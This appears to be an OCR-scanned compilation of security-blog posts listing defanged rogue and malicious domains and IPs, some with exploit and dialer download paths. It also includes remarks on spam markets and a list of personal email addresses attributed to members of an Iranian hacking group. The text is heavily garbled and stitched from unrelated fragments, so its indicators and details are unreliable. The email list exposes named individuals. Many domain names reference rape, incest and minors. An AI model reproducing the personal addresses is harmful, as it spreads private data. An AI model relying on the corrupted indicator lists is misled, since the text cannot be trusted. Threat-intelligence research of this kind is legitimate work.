sikici[.]Jcom 

unoerotica[.]com 
use-your-brain[.]com 
xxxasiansites[.]Jcom 
hotfreebies[.]com 
coolfreepage[.]com 
coolfreepages[.]com 
curvedspaces[.]com 
ionichost[.]com 
iwebland[.]com 
ww2[.]Jiwebland[.]Jcom 
xc4val[.Jiwebland[.]Jcom 
jonas[.]coolfreepages[.]Jcom 
starwars[.]coolfreepages[.]Jcom 
galleries[.]mpegstation[.]com 
mpegstation[.]Jcom 
700k[.]Jcom 
movierevenue[.]com 
dedmazail[.]com 
99livecam[.]com 
porn-mix[.]Jcom 
toprefsys[.]Jcom 
minisearch[.]startnow[.]com 
startnow[.]com 
galleries[.Jallinternal[.Jcom 
xxxdirtylist[.]com 
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66[.]55[.]136[.]82[.]gigabits[.Jus 
cx[.Jlinklist[.Jcc 
linklist[.Jcc 
N3[.]searchx[.]ccl[.] 
th[.]msie[.]cc 
Ocalories[.]net 
1-domains-registrations[.]com 
crazyfinder[.]Jcom 
looksa[.]com 
tunders[.]com 
turbofind[.]Jcom 
scumware-remover[.]org 
h-c-t[.]Jcom 
smartestsearch[.]Jcom 
66[.]79[.]183[.]140 
do-jaja[.]Jcom 
allcybersearch[.]Jcom 
hotpopup[.]com 
hotsearchbox[.]com 
I-SEARCH[.]COM 
jethomepage[.]Jcom 
jetseeker[.]Jcom 
searchxl[.]Jcom 
tinybar[.]Jcom 
topsearcher[.]com 
znext[.]Jcom 
adult-empire[.]Jcom 
anathema[.]biz 
boysporn[.]net 
directsin[.]net 
freehostempire[.]net 
momboyporn[.]com 
pretty-teens[.]info 
russian-amateur-porn[.]com 


sex-here[. ]biz[.] 
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sex-network[.]info 

ww-foto[.]info 
66[.]98[.]194[.]89/adrevenue/index[.]php 
greenmoney[. ]biz 

itmarkservers[.]com 

qualityswap[.]com 

showhitcounter[.]com 

showyour[.]Jinfo 

viagrasildenafil[.]com 

cyprusturk[.]net 

search-casino[.]com 

directsearch[.]net 
mega[.]directsearch[.]net 
mymaydayinc[.]Jcom 

ne-ebu[.]com 

netsearch[.]Jcom 

hotsearchbar[.]com 
67[.]18[.]129[.]75/connect[.]cgi?id=1351 
vischmarkt[.]org 

aboutclicker[.]Jcom 

amicodiieri[.]it 

sex-or-sex[.]Jcom 
67[.]19[.]51[.]10/enter/access2[.]asp/is/seksdialer[.]exe 
67[.]19[.]51[.]4/content 
handicaphelp[.]cz 
clean-hosted-galleries[.]Jcom 
theincest[.]com 
69[.]20[.]62[.]53/yyy5[.]html 
squirtitinme[.]Jcom 

virginz[.]info 

trygames[.]com 

deardrocher[.]com 

seek2[.]com 

mypoiskovik[.]Jcom 
69[.]31[.]79[.]100/winsearchie32[.]chm/winsearchie32[. Jexe 
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pizdato[.]biz 
CUTEGIRLSPORN[.]COM 
devilsfuck[.]Jcom 
HARDCOREOVER|[.]COM 
NATIVEBLACKPORNO[.]COM 
tvé6tut[.]info 
solongas[.]com 
here4search[.]com 
NATIVEHARDCORE[.]COM 
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mig29here[.]com 
webanalsex[.]com 
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t34rulit[.]Jcom 
69[.]31[.]85[.]151/G7/ 
GREG-TUT[.]JCOM 
teenpyramid[.]com 
kitasearch[.]com 
windowws[.]cc 
yourbookmarks[.]info 
datasearch[.]info 
69[.]31[.]86[.]221/se[.]php 


69[.]31[.]86[.]221/xltmk[.]dat 


adult-friends-finder[.]net 
coolsearcher[.]info 
coolwebsearch[.]info 
coolwebsearch[.]Jorg 
domainname4youl[.]com 
fukingmachines[. Jinfo 
girls-porn-life[.Jcom 
hogtied[.]info 
machinesboys[.]Jcom 
manufacturingporn[.]com 


meninpain[. ]biz 
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nevest[.]net 
onlyfuck[.]Jcom 
pavlovbooks[.]com 
peniscontent[.]com 
pereulok[.]net 
pornfree[. info 
pornosaity[.]com 
pornpic[.]org 
pornsecretaries[.]biz 
prague-porn[. ]biz 
prague-sex[.]com 
put-your-link-here[.]com 
rape-cool-video[.]Jcom 
sebastacz[.]com 
sexbanan[.]com 
sex-prague[.]com 
sex-tgpl.]linfo 
shopknights[.]com 
waterbondage[.]biz 
zaseyan[.]com 
AMATEUR-VOYEUR[.]BIZ 
BEST-RESULT[. JINFO 
BEST-SEARCH[.]INFO 
BIGPORNMOVIES[.]BIZ 
EASY-DOLLARS[.]COM 
NEO-TOOLBAR[.]COM 
PORNMPG[.]BIZ 
SEARCHBAR[.]INFO 
SEARCH-SMART[.]INFO 
hostssp[.]com 
www666[.]hostssp[.]Jcom 
about-blank[. ]biz 
O5p[.]Jcom 
easy-gals[.]net 
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AIPYTVME CTPAHbI: 


1 000 000 email - 130¢ 
3 000 000 email - 200¢ 
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A 


For the time being, we’ve got several developed and many other developing market segments 
within spamming and phishing as different markets with different players. On one hand are 
the legitimately looking spamming providers offering "direct marketing services" working with 
lone spammers who find a reliable business partner in the face of the spamming vendor whose 
customers drive both side’s business models. On the other hand, you've got the [2]spammers 
excelling in outsourcing the automatic account registration process, coming up with ways to 
build a spamming infrastructure - already available as a module to integrate in [3]managed 
spamming services - using legitimate services as a provider of the infrastructure. 


Despite that the arms race seems to be going on at several different fronts, spammers 
VS the industry and spammers VS spammers fighting for market share, the entire under- 
ground ecosystem is clearly allocating a lot of resources for research and development in 
order to ensure that they are always a step ahead of the industry. 


Related posts: 

[4]Harvesting Youtube Usernames for Spamming 
[5]Thousands of IM Screen Names in the Wild 
[6]Automatic Email Harvesting 2.0 

[7]Dissecting a Managed Spamming Service 
[8]Managed Spamming Appliances - the Future of Spam 
[9]Inside an Email Harvester’s Configuration File 
[10]Segmenting and Localizing Spam Campaigns 
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downloads[. ]default-homepage-network[.]com 
COOLNAMESERV[.]COM 
enjoysearch[.]info 
dmporn[.]Jcom 
PROLIVATION[.]JCOM 
SEXYQUE[.JCOM 
fromru[.]Jcom 
mail333[.]Jcom 
pisem[.]net 
looking-for[.]cc 
Calls search-about[.]net 
ns1[.]Jrealsearch[.]ws 
18885 


ns2[.]realsearch[.]ws 
bigbr[.Jcc 
happy-new-year[. ]biz 
PERFECT-SEARCH[. ]JINFO 
SEARCHALL[.]JINFO 
SMART-FINDER 
START-PAGE[. JINFO 
SUPER-FINDER[.]INFO 
SURFAST[.]JINFO 
YOBTAT[. JINFO 
YOPTA[.]JINFO 

nkvd[.]us 
81[.]211[.]105[.]37/20605 
81[.]211[.]105[.]37/551 
your-search[.]cc 
search-biz[.]cc 
searchcentrall[.]cc 
get-search[.]cc 
best-search[.]cc 
buysearch[.]cc 
search-web[.]cc 
home-search[.]cc 
hot-searches[.]com 
lender-search[.]com 
searchx[.]cc 
seek-all[.]Jcom 
yoursearch247[.]Jcom 
lookingfor[.]cc 
riviera[.]cc 
search-town[. ]net 
lookfor[.]cc 
searchv[.]Jcom 
hugesearch[.]net 
4-counter[.]com 
crue[.]global-counter[.]com 
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dia[.]4-counter[.]Jcom 
gigafinder[.]Jcom 
global-counter[.]Jcom 
icanfindit[.Jnet 
tonser[.]4-counter[.]Jcom 
e-sexcash[.]com 
0190-dialer[.]Jcom 
crackz-serialz[.]Jcom 
mp3search[.]ws 
inhost2[.]info 
loliboard[.Jinhost2[.]info 
loliz[.Jinhost2[.linfo 
81[.]9[.]3[.177/click[.]php 
countere[.]Jcom 
pukkasearch[.]net 
realsearcher[.]Jcom 
super-spider[.]com 
Runs CHM exploits 
esearch[.]cc 
heretofind[.]Jcom 
xxxmyporno[.]com 
JUST2YOUNG[.]COM 
lolave[.]Jcom 
LOLITUSHKA[.]COM 
MAXIYOUNG[.]JCOM 
PORNOZA[.]COM 
SKYINPUSSY[.]COM 
d8t[.]biz 

ewizard[.]cc 
iIxt[.Jinfo 
S1[.]topx[.]cc 
swapx[.]cc 

topx[.]cc 
2020search[.]com 


websearch[.]com 
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bossofthesauce[.]com 
msie[.]tv 
ohmygoodies[.]com 
umaxforum[.]com 
sex[.]damhost[.]Jcom 
damhost[.]com 
free[.]milfondick[.]Jcom 
www [.]wallpaperofwomen[.]com 
count[.]cc 
4e064[.]Jilxt[.Jinfo 
oz[.]msie[. ]tv 
s12ds2[.]ewizard[.]cc 
wwwl.]searchx[.]cc 
Generic 

searchmeup[. ]cc 
coolwebsearch[.]cc 
js[.]searchx[.]cc 
ga31[.]com 

all-find[.]net 
allneedsearch[.]com 
bestpornnews[.]com 
search-all[.]net 
DAILY-SEARCH[.]COM 
DIRTY-OLD-WOMAN[.]COM 
drusearch[.]Jcom 
OLDSUKI[.]JCOM 
pornxxxsearch[.]com 
SEARCH-INSTRUCTOR[.]COM 
VIEWPORNKEY[.]COM 

snm 

searchhh[.]com 
195[.]225[.]177[.]13/20609/whocares[.]jpg 
makemesearch[.]com 
SEARCH-AND-MORE[.]COM 
search-control[.]com 
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NONSTOPSEARCH[.]COM 
296f8[. ]ilxt[. info 

cObb8[. ]ilxt[. info 
FREEPAGE[.]WS 
your-startpage[.]com 
008k[.]Jcom was 209[.]66[.]114[.]129 
010402[.]Jcom 
171203[.]Jcom 

20x2p[.]Jcom 
212-229-05[.]Jcom 
284b[.]Jcom 

39-93[.]Jcom 

61-31[.]Jcom 

664p[.]Jcom 

a-137[.]com 

n-udd[.]com 

p-uud[.]com 

t058[.]Jcom 

u-239[.]com 

v-224[.]Jcom 

t[.]swapx[.]cc 
likesurfing[.]com 
schutz[.]de 

axal[.]de 

homepage[. ]ru 
search[.]2020search[.]com 
pop[.]popuptoast[.]Jcom 
199[.]227[.]31[.]199/ssredir/gb[.]htm| 
www[.]75z[.]com 
BESTGENERICPRICES[.]COM 
BUYCHEAPESTVIAGRA|[.]COM 
BUYSMARTERONLINE[.]COM 
FASTVISITCOUNTER[.]COM 
GETGOVTMONEY[.]COM 


KAZAAMP3S[.]COM 
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SYSPAGE[.]COM 
203[.]199[.]200[.]62/noname/popup _func[.]js 
xmlsearch[.]findwhat[.]Jcom 
findwhat[.]com 
qmov[.]Jcom 
search-center[.]Jcom 
goldenpalace[.]com 
SMARTBOTPRO[. ]NET 
default-homepage-network[.]com 
apps /7a[. ]ifriends[.]net 
archiveview[.]iFriends[.]net 
access2[.]ifriends[.]net 
directorydrugs[.]Jcom 
spyware-removall.]name 
206[.]161[.]120[.]178/help/s1[.]html 
world-search[.]biz 

Installs winxpsys[. ]dll 
LOOMATURE[.]NET 
LOOPANTYHOSE[.]COM 
123ZAE[.]BIZ 
18AGE-DOMINATION[.]COM 
2000GUYS[.]COM 
ACHAEANS[.]COM 
ACHILEOS[.]COM 
ADDICTIVETOPORN[.]COM 
AD-UA[.]COM 
ADULTCHAT-ROOMS[.]BIZ 
ADULT-XXX-TGP[.]COM 
AKTOBUT[.]COM 
ALLNAKEDBOYS[.]JORGI[.] 
AMERICANBOY[.]NET 
ANIME-BABES[.]JINFO[.] 
ART-VARIOUS[.]COM 
BABESXXX[.]NET 
BEAST4ME[.]COM 
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BESTHOMEPORN[.]COM 
BONNE-PUTE[.]COM 
BRADLEYHITS[.]BIZ 
BRUTEENS[.]COM 
BUSTYMOMMY[.]COM 
CASHINFO[.]BIZ 
CHARMING-TEENS[.]COM 
COOLTEENPORNO[.]COM 
DAILYTEENSPIC[.]COM 
DARKRAPESEX[.]COM 
DOG-CUM[.]COM 
DREAMXSEX[.]JCOM 
DREAMXSITE[.]JCOM 
EBOOKCREATORPROJ. ]BIZ 
FETISHCRIME[.]BIZ 
FILLE-AFRICAINE[.]COM 
FINENYLON[.]JCOM 
FREEADULT-WEBCAMS[. ]BIZ 
FREETEEN-SLUTS[.]COM 
FUCKEDBOYS[.]NET 
GAY-DESIRE[.]COM 
GAYSINCEST[.]JCOM 
GET-BONDAGE-BDSM|[.]COM 
GO4SEXXX[.]COM 
GOODXXX[.]NET 
HIDDEN-FILES[.]COM 
HOTBIGTIT[.]COM 
HOTNETTEENS[.JCOM 
HOTSEXXGIRL[.]COM 
HUNGRYPUSSI[.]COM 
ie-search[.]com 
IMAGE-CHAUDE[.]COM 
INFERNS-SOFT[.JCOM 
IRCFOREVER[.]NET 
KARPINA[.]COM 
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LAND-XXX[.]JCOM 
LEONIXXX[.]COM 
LESBO-DESIRE[.]COM 
LOLMATURE[.]COM 
MARABLIC[.]COM 
MATUREJOURNAL[.]COM 
MATURE-TECH[.]COM 
METHODSILVA[.]COM 
MIKROVIN[.]COM 
MONSTER-RAPE[.]COM 
NEXTCUNT[.JCOM 
NIKUSHAT[.]BIZ 
NUDE-LIVEGIRLS[.]BIZ 
NUDE-VIDEOCHATT. JBIZ 
NYLONEROTICA[.]NET 
PL-CLUB[.JCOM 
PORNOGALAXY[. JBIZ 
PORNREST[.]JCOM 
POSTFORWARDING[. JBIZ 
PROHOR[.]COM 
PROJECT-21[.JINFO[.] 
PROJECT-TWENTY-ONE[. JINFO[.] 
PROUPVER[.]JCOM 
RAPECHAOS[.]COM 
RAPEFLARE[.]COM 
S4TEENS[.JCOM 
SEX3DOM[.]COM 
SEXDELUXE[.]NET 
SEXINWAR[.]NET 
SEXXELA[.]JCOM 
SEXXX-4YOU[.]JCOM 
SEXXXGATE[.]JCOM 
SMUTBITCHES[.]COM 
TEENS-ADULT[.]COM 
TEENSDOM[.]COM 
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[11]Shots from the Malicious Wild West - Sample Four 


 ibtp://adanchev blogspot .con/2008/06 /narvesting-youtube-usernanes~for. bial 
_ hep: /eloge. zdnet .con/security/?p=1855 
| http://blogs. zdnet con/security/?p-1899 
| http://adanchey blogspot .con/2008/06 /narvesting-youtube-usernanes~for. bial 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2007/10/thousands- of-im-screen-names-in-wild.htm 
6 
7 
8 
9 


. http: //ddanchev. blogspot .com/2008/08/automatic-email-harvesting-20.htm 
. http: //ddanchev. blogspot .com/2008/07/dissecting-managed-spamming-service.htm 
. http: //ddanchev. blogspot .com/2007/10/managed- spamming-appliances-future-of .htm 


ttp://ddanchev. blogspot .com/2007/01/inside-email-harvesters-configuration.htm 


4.9.13 Hijacking a Spam Campaign’s Click-through Rate (2008-09-26 16:06) 


From: Ga @yahoo.com> FF} 

(Ti sender Domains vee 
Cc: sv srkbdwork i@yahoo.c 2m, ter ansont 20.com 

tile jeri @yaho orn, astal tswore yahoo 
cal 100.com, ¢t ismack ahoo.c 
mi om, arian’ byahoc m, sere S9@yahoo.com, 
chi n, sheikha al.net Js76@) 1.com 
da com, phert > 1o.com asugold: Byahoo.com, 
vir com, adpr cidoben yahoo n 
ya "@ysahoo.c hkdiver 32002 ihoo.co iByoky@yahoo.com 
ter ahoo.com wa pitis 3@yah com 
aa) 20.cOM, pr 


im xq wmp 


This [1]spammer is DomainKeys verified, a natural observation considering that the [2]spam 
compaign which | discussed last Wednesday is using [3]bogus Yahoo Mail accounts, and is 
spamming only Yahoo Mail users through a segmented emails database. 


Not necessarily what | wanted to achieve, but once posting the spam campaigns SEO 
URLs, Yahoo’s crawler’s picked up the post pretty fast, and have ruined the SEO effect, with 
everyone clicking on the campaign’s links reaching the post. Close to 15,000 unique visitors 
reached the article during the past 7 days since the now hijacked, spoammer’s link is no longer 
achieving the effect it used to. 
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TEENS-HC[.JCOM 
TEENSUNION[.]NET 
THEBESTGALLERY[.]NET 
THEBESTMATURES[.]COM 
THE-FOREX[.]COM 
TOPFREETEENS[.]COM 
TOP-SEARCHS[.]COM 
TRAHVIDEO[.]COM 
UKR-GIRLS[.JCOM 
UNIQUE-PORN[.]COM 
WEBCAM-GIRLSNUDE[. JBIZ 
WEBNYMPHETS[.]COM 
WMINVEST[.]BIZ 
WORLD-HYP[.]BIZ 
X-EROTICBABE[.]COM 
XMATUREPORN[.]COM 
XSBY[.JORG[.] 
XXXENJOY[.JNET 
XXX-REVOLUTION[.]COM 
ZETTA-SEARCH[.]JCOM 
ZTOMB[.]COM 
1-se[.Jcom 
error[.]99fh[.]com 
206[.]161[.]192[.]166/search[.]php /Richfind[.]Jcom ES 
99fh[.]Jcom 
search-ing[.]com 
richfind[.Jcom 
bestsekch[.]cc 
ehtp[.]cc 
searchcactus[.]com 
AMANDABBW[.]COM 
AMATEURXPOSED[.]COM 
AWESOMETEENMOVIES[.]JCOM 
DIRTYSOUTHHOHOUSE[.]COM 
GAYBOYNETWORK[.]COM 
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GAYCAMPUS[.]NET 
GAYMALEPORNPICS[.]COM 
GIRLSLAND[.]BIZ 
LESBEE[.]JCOM 
MAD4PORN[.]COM 
MOKAR[.]COM 
NUDITYFORFREE[.]COM 
PANTYCANDY[.]NET 
SEXSCNI[.]JCOM 
SEXTOYWONDERLAND[.]COM 
TASTYCAMS[.]COM 
THADSADULTSUPERSTORE[.]COM 
THADSAMATEURS[.]COM 
THADSASIANS[.]COM 
THADSBOYS[.]COM 
THADSCANDIDCAMERA|[.]COM 
THADSCOLLEGEGIRLS[.]COM 
THADSFRIENDS[.]COM 
THADSHOMETOWNGIRLS[.]COM 
THADSLATINS[.]COM 
THADSPRIVATEVIDEOS[.]COM 
THADSXRATEDSWINGERS|[.]COM 
THEPLAYFULWIFE[.]COM 
WANDERERX[.]COM 
freephotosonly[.]Jcom 
startium[.]Jcom 
karasxxx[.]com 
7BUSCAR[.]COM 
7search[.]Jcom 
BUSCAMUNDO[.]COM 
SEVENSEARCH[.]COM 
ads[.]softwareoutfit[.]com 
internetantispy[.]com 
kpremium[.]Jcom 
popupguard[.]Jcom 
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billingnow[.]Jcom 

vicehouse[.]com 
wickedgooddeals[.]com 
adultfriendfinder[.]Jcom 
MCPROMOTIONS|[.]COM 

cl[.Jzedo[.]Jcom 

trixscripts[.]Jcom 

zeropopup[.]com 

Swift-Look[.]Com 

fuckingfree[.]net 
209[.]25[.]173[.]4/redirectu[.]php 
BANNER-SERVER-USA-ENGLISH[.]COM 
www[.]server224[.]smartbotpro[.]net 
searchtraffic[.]com 
209[.]50[.]251[.]182/adc/adc-z[.]html 
209[.]50[.]251[.]182/e1/preexploit[.]htm 
209[.]50[.]251[.]182/new-exploit5//exploit[.]exe 
209[.]50[.]251[.]182/new-exploit5/exploit[.]htm 
209[.]50[.]251[.]182/newspynotice[.]html 
cpm-04[.]Jcom 

BOOKHUGS[.]COM 

lovemynet[.]Jcom 

passthison[.]com 

clickheretofind[.]Jcom 
object[.]passthison[.]com 
21century-mp3[.]nu 

OOha[.]Jcom 

full-search[.]net 

go2-search[.]com 
HOTBOOKMARK[.]COM 
onemoresearch[. ]net 

opsex[.]com 

search-1[.]net 

search-777[.]com 


search-about[. ]net 
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search-and-find[.]net 
search-direct[.]net 
search-to-find[.]Jcom 
searchxp[.]Jcom 
runsearch[.]com 
thematurehardcore[.]com 
zesearch[.]com 
356563[.]net 

in[. ]webcounter[.]cc 
freehostedgalleries[.]Jcom 
v61[.]com 
littlegardener[.]Jcom 
x[.]full-tgp[.]net 
AISAUTO[.]COM 
BEST-SITES[.JORG 
Big-biblioteka[.]Jcom 
Big-penis-pics[.]Jcom 
Circlesfarms[.]com 
Cxem[.]Jorg 
directrape[.]Jcom 
E-jobru[.]Jcom 
Free-milf-porno[.]Jcom 
Free-pissing[.]org 
Free-porn-art[.]Jcom 
Girl-pissing[.]net 
Girlrapes[.]Jcom 
Hot-supermodell[.]Jcom 
Incest-movies[.]Jorg 
Iteens[.]info 
Ma3cal[.]com 
Masturbate-pics[.]com 
Maxmirnyi[.]com 
Mb50[.]com 
Model-gallery[.]net 
Mogilka[.]Jcom 
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Moiweb[.]com 
Mpzone[.]net 
Nude-sex[.]org 
Nylons-sex[.]net 
Petite-women|[. ]biz[.] 
Plumper[. ]biz[.] 
Pornstars-pix[.]Jcom 
Reality-porn-site[.]info 
Ruspatch[. Jinfo 
Russian-hardcore[.]net 
S4people[.]Jcom 
Smoking-erotica[.]com 
Stocking-adult-site[.]com 
Stripting[.]Jcom 
Suck-sex[.]org 
Swinger-sex[.]Jorg 
Teens-have-sex[.]com 
Thehan[.]net 
Topless-sex[.]com 
Ultrahoster[.]com 
hotsex[.]fuckingfree[.]net 
aifind[.]biz 

AIFIND[.JCOM 

aifind[.]info 
theparadise[.]x-y[.]net 
allyes[.]com 

ufo365[.]Jcom 

bOOgle[.]Jcom 
trytoimprovesecurity[.]com 
search[.]findwhatevernow[.]com 
seznam[.]cz 

calls smart-security[.]info 
213[.]159[.]117[.]133/legal/x[.Jchm 
213[.]159[.]117[.]134 
213[.]159[.]117[.]134/index[.]php 
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petite-virgins[.]biz 

zy web search: exploiter 
cashsearch[.]biz 

smart-security[.]info 
213[.]159[.]117[.]150/deaGB333[.Jexe 
freednshost[. info 
Ilfgjc[.]Jouthost[.]info 
SECURITY-WEB[. ]BIZ 
SECURITY-WEB[. JINFO 
SMARTSECURE[. ]JINFO 

linkey[.Jru 

Windows media player exploit 
haldex[.]com 
searchbar[.]findthewebsiteyouneed[.]com 
terra[.Jes 

pornsites[.]da[.]ru 

runs 38ble[.]Jchm exploit wincfgrid[.]exe 
epsilon[.]searchassistant[.]net 
searchfeed[.]com 

line-plus[.]Jcom 

N1[.]searchx[.]cc[.] 
adult[.]slotch[.]com/goodies/passpost/passpost[.]html 
couldnotfind[.]com 
install[.]xxxtoolbar[.]Jcom 
INSTALLCASH[.]COM[.] 
isearchtech[.]com 
power-cleaner[.]com 
SIDEFIND[.]JCOM[.] 

slotch[.]com 

slotchbar[.]com 

toolbarcash[.]com 
XXXTOOLBAR[.]COM[.] 
YOURSITEBAR[.]COM[.] 
cgi[.]gammae[.]com 
tracking[.]gammae[.]com 
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gammacash[.]com 
gammae[.]com 
vestalgirls[.]Jcom 
69bymaill.Jcom 
megarape[.]Jcom 
begin2search[.]com 
POPUPSEARCHES|[.]COM 
auto[.]isearch[.]com 
isearch[.]com 
TeoCash[.]com 
absolutelyfreemovies[.]Jcom 
grab[.]nastydollars[.]Jcom 
adtraffic[.]net 
irc[. Jeliteshells[.]net 
CYBERHEATINC[.JCOM 
IBLOCKPOPUPS[.]COM 
INTERNETQUICKSEARCH[.]COM 
INTERNETQUICKSEARCH[.]NET 
IQUICKSEARCH[.]COM 
IQUICKSEARCH[. JNET 
MYSEARCHHOME[.]COM 
SEARCHBUCKZ[.]COM 
SEEKIO[.]COM 
sureseeker[.]com 
savantmedial.]Jcom 
coolloud[.]org 
vbs[.]searchwwwl[.]com 
uralcash[.]Jcom 
saintsex[.]com 
v73[.]us 
your-search[. info 
spywarehelp[. ]net 
maill.]Jodysseusmarketing[.]com 
maill.]spywarehelp[.]net 
odysseusmarketing[.]com 
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Searchassistant[.]net 
Unitedvending[.]net 
amigeek[.Jcom 
gocybersearch[.]com 
messagebroadcaster[.]net 
winsellpos[.]com 

instalg[.]ws 

wazzupnet[.]com 
eliteshells[.Jnet 
freepornbest[.]com 
crossdots[.]com 

darkest[.]Jcom 

fanatik[.]net 

dialeraccess[.]com 
pluginaccess[.]Jcom 
217[.]73[.]66[.]1/del/[.]dia[.Jexe 
gd[.]geobytes[.]Jcom 
555y[.]Jcom 

y3y[.]net 

2awn[.]com 
achtungachtung[.]com 
CLICKENZER[.]COM 
eselmann[.]com 
REINIGUNGFRAU[.]COM 

00[.] CoolWebSearch 
217[.]73[.]66[.]1/del[.]dia[.]lexe 
64[.]127[.]104[.]144/ 
67[.]19[.]51[.]10/enter/access2[.]Jasp 
69[.]31[.]79[.]100/winsearchie32[.]chm 
81[.]211[.]105[.]37/20605 
eliteshells[.]net 

find4ul[. ]net/enter[.]Jhtm 
freeload[.]cc 
downloads[.]default-homepage-network[.]com 
jetsearch[.]org 
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msr[.]ms 

netfind[.]biz 

$13[.]tempx[.]cc 

sp2fucked[.]biz 

tempx{[.]cc 
vv6[.]s13[.]tempx[.]coc 
www[.]wallpaperofwomen[.]com 
OOO0info[.]Jcom 

Stay tuned! 


1. https://blogger .googleusercontent .com/img/a/AVvXsEiybY jnzDOET jHYj10d8nV7_DOVZ7z4Ukmzgrcg5Y jk8zpurTWH jwvoMg 
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18.1.27 Profiling a Currently Active Personal Email Address Portfolio of Members of 
Iran’s Ashiyane Digital Security Team - An OSINT Analysis (2022-01-28 14:09) 
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[1] 
Dear blog readers, 


I’ve decided to share with everyone a currently active personal email portfolio belonging to 
members of Iran’s Ashiyane Digital Security Team with the idea to assist everyone in their 
cyber attack or cyber threat actor attribution campaigns. 


Sample currently active personal emails known to belong to members of Iran’s Ashiyane Dig- 
ital Security Team: 


mOstagim@gmail[.Jcom 
mtn97[.]hacker@yahoo[.]com 
sil3nt _sil3nt@yahoo[.]com 
midia595@yahoo[.]com 
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Dead[.]Zone@att[.]net 

nO _sec@yahoo[. ]it 
MagicCOd3r@gmail[.]Jcom 
Faghat be _khatere to6000@yahoo[.]com 
raminshahkar73@yahoo[.]com 
nitrOjen26@asia[.]com 
Lord[.]private@ymail[.]Jcom 
mehdy007@hotmaill. ]fr 
plus[.]Jashiyane@gmail[.]com 
pashe kosh9@yahoo[.]com 
omid[.]ghaffarinia@gmail[.]Jcom 
Pashekosh8@gmail[.]Jcom 
pashe kosh8@yahoo[.]com 
Sun[.]JArmy@Asia[.]com 
sajjad13and11@yahoo[.]Jcom 
sajjad13and11@yahoo[.]Jcom 
Faridmahdavi90@yahoo[.]com 
omid[.]ghaffarinia@alum[.]sharif[.Jedu 
Nitrojen26@Yahoo[.]Com 
h-skeepy @att[.]net 
datacoders25@gmail[.]Jcom 
ica_r00t@yahoo[.]com 
nic[.]ir@live[.]com 

arta _ir313@yahoo[.]com 
h[.]Jsk33py@y7mail[.]Jcom 
Mazhar FashisT@yahoo[.]com 
Mazhar[.]Fashist@gmail[.]Jcom 
support@multivpnl. info 

|_| darklOrd | I@yahoo[.]Jcom 
Xhacker42@yahoo[.]com 
datacoders25@gmail[.]Jcom 
MrL[.JSkitt3r@att[.]net 
xpr_program@yahoo[.]com 
Skitt3r@yahoo[.]Jcom 
4rM4n@att[. ]net 
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. 4 DIAMOND REPLICAS 


What does this prove? It proves that users tend to trust emails that pass through spam filters 
so much that they actually click on the links. And whereas it’s a spam campaign, and not a 
malware campaign, the next time they over trust such a email, they’ll expose themselves to 
client-side vulnerabilities courtesy of a copycat web malware exploitation kit. 


The latest search query the campaign is using : 
- yahoo.com/search/search; _yit=?P=.........cceeeeeeeeeeeeeeeeeee 0 teeeaa eens stossregularnew............ 
leads to stossregularnew.com (61.255.135.185). 


- yahoo.com/search/search; _ylt=?p=||||[IIIIII[[[[clapmoon]|[[ [III] Tl S229] // IIIT] leads 
to clapmoon.com (122.198.62.4). 


1. http://blogs.zdnet.com/security/?p=1514 
2. http: //ddanchev. blogspot . com/2008/09/spam-campaign-abusing- yahoos-services. html 
3. http://blogs.zdnet .com/security/?p=1418 


4.9.14 The Commercialization of Anti Debugging Tactics in Malware (2008-09-29 22:27) 
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V30sharp@yahoo[.]com 
hellboy[.]blackhat@yahoo[.]com 
hosseinxpr@gmaill[.]Jcom 
Fire[.]Mafia@yahoo[.]com 
mr[.]xp[.]20@gmail[.Jcom 
I20odon@yahoo[.]com 
eparsdata@gmaill.Jcom 
parshostl@gmail[.Jcom 


mr[.]xp[.]20@gmail[.Jcom 


wOrm[.]cOd3r[.]blackhat@gmail[.]Jcom 


I3lackhat@yahoo[.]Com 
I3lackhat[.Jir@gmail[.Jcom 
ZEROCoOL H@yahoo[.]com 
n3td3vill[.]nopotm@gmaill.]Jcom 
Oxsecure[.]network@gmaill.Jcom 
ashkan _wanted@yahoo[.]com 
kinglet@hackermail[.]Jcom 
cyb3rgO0df4th3r@yahoo[.]Jcom 
smart[.]noise@yahoo[.]Jcom 
D3It4 lOrd@yahOO[.]Jcom 

bl4ck lOrd@yahoo[.]com 
Delta[.]Secure@Gmail[.]JCom 
ashiyane[.]center@gmail[.]com 
LOrd@dr[.]Jcom 
Cru3l[.]b0y@gmail[.Jcom 
ashiyane[.]center@gmail[.]com 
iranweb@socal[. Jrr[.]Jcom 
behrooz _ice@yahoo[.]com 
Delta[.]Secure@gmail[.]JCom 
nima[.]salehi@yahoo[.]com 
behrooz _ice@yahoo[.]com 
behrooz[.]kamalian@yahoo[.]com 
behrooz[.]kamalian@gmail[.Jcom 
unique2world@gmail[.]com 
hossein19123@yahoo[.]com 
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prOgrammer[. ]lashiyane@gmail[.]Jcom 
Milad _al[.]kh22@yahoo[.]com 
ashiyane org@yahoo[.]com 
Sha2o0w@hackermail[.]Jcom 
Prince[.]JH4ck@gmail[.]Jcom 
goldhat@hackermail[.]Jcom 
mr _det3ctOr@yahoo[.]com 
keyoube@yahoo[.]com 
bbc@irsecteam[.]org 
v[.Jelmi67@yahoo[.]Jcom 
skychat vhd@yahoo[.]com 
mr[.]shahram@irsecteam[.]org 
alimp5@sepnata-team[.]org 
ali0511@irsecteam[.]org 
turkish boy73@yahoo[.]com 
dangel2[.]team@gmail[.]Jcom 
xehsan902@gmaill[.]Jcom 
saeidperak@yahoo[.]com 
silentxhacker@yahoo[.]com 
v[.Jelmi67@yahoo[.]Jcom 
babolhost@gmail[.]Jcom 


Stay tuned! 


1. https: //blogger.googleusercontent.com/img/a/AVvXsEjWhj 1n3vmjt9P98kjtFXSk8PM5cHy0zr1S9MeWSOHEn8LSvvYROW4B9 
4HZLF24ui gHcZkrgQzMGYvebF yK7Hxf _3xC50PX_X3o0bkxCknxX00zt 


18.1.28 Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains 
Portfolio - Part Three - An OSINT Analysis (2022-01-28 14:10) 


[1] 
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m: CWShredder - CoolWebSearch Trojan Remover v2.18 4 


SE TE NS a 


“TREND MICRO’CWShredder== 


Please wait while your system is scanned. 


Scanned Resuk 

CWS. AFF, Winshow Not Present 
CWS. AFF. Madfinder Not Present 
CWS. AFF. Tooncomics Not Present 
CWS. AFF, Toolband Not Present 
CWS. SysTime Not Present 
CWS. HomeSearch Not Present 
CWS, Look2Me Not Present 
CWS.MsFind Not Present 
CWS. Cassandra Not Present 
CWS, AgertuD Not Present 
CWS. SnugWweb Not Present 
CWS, CoolSearchA Not Present 


